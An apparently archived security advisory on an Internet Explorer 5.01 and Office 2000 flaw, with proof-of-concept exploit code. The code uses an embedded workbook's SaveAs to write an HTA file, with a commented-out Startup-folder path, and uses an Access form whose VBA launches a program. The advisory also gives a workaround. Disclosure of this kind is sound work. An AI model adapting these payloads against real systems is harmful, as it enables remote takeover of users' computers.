|
|
|
|
| |
A combination of Internet Explorer 5.01 with Excel, PowerPoint or Access 2000 enables attackers to execute local commands by designing a special web page or sending a custom HTML email message (using IFRAME in the latter case).
This means that users who use IE to browse the web and have Office 2000 installed are expose themselves to an attack that results in full control over the user's computer. |
| |
Credit:
The information has been provided by Georgi Guninski.
|
| |
Vulnerable systems:
IE 5.01 and where Excel 2000, PowerPoint 2000 or Access 2000 are installed.
IE 5.01 can launch dangerous ActiveX objects with the help of the <OBJECT> tag and Office 2000 applications. For example, the following code loads an XLA file:
<object data="Book1.xla" id="sh1" width=0 height=0></object>
where Book1.xla is just an XLS file renamed to XLA. The same result may be achieved with a .ppt or .xls file, and probably other Office 2000 file types.
The result is having an object in IE that offers a SaveAs() method. The SaveAs method can save the Excel Workbook or PowerPoint object in arbitrary location, including the startup folder. The content of the saved file is controllable and depends on the content of Book1.xla. If the saved file is an HTA file, for example, it is possible to execute arbitrary programs on the user's computer.
Exploit:
---------------------------------------------------
<object data="Book1.xla" id="sh1" width=0 height=0>
</object>
<SCRIPT>
function f()
{
fn="C:\\georgi-xla.hta";
sh1.object.SaveAs(fn,6);
/*sh1.object.SaveAs("C:\\windows\\Start
Menu\\Programs\\StartUp\\georgi-xla.hta",6);*/
alert(fn+" sucessfully written");
}
setTimeout("f()",5000);
</SCRIPT>
---------------------------------------------------
Demonstration:
A live demonstration is available at:
http://www.nat.bg/~joro/sheetex.html
Exploit Code for Access 2000:
-----------access.html----------------------------
<OBJECT data="db3.mdb" id="d1"></OBJECT>
-----------in Form1 of db3.mdb---------------------
Private Sub Form_Load()
On Error GoTo Err_Command0_Click
Dim stAppName As String
stAppName = "C:\Program Files\Accessories\wordpad.exe"
MsgBox ("Trying to start: " & stAppName)
Call Shell(stAppName, 1)
Exit_Command0_Click:
Exit Sub
Err_Command0_Click:
MsgBox Err.Description
Resume Exit_Command0_Click
End Sub
---------------------------------------------------
Form1 is automatically opened at database startup.
Demonstration:
A demonstration of the access vulnerability is available at:
http://www.nat.bg/~joro/access.html
Workaround:
Disable Active Scripting or Disable Run ActiveX controls and plug-ins.
|
|
|
|
|
|
|
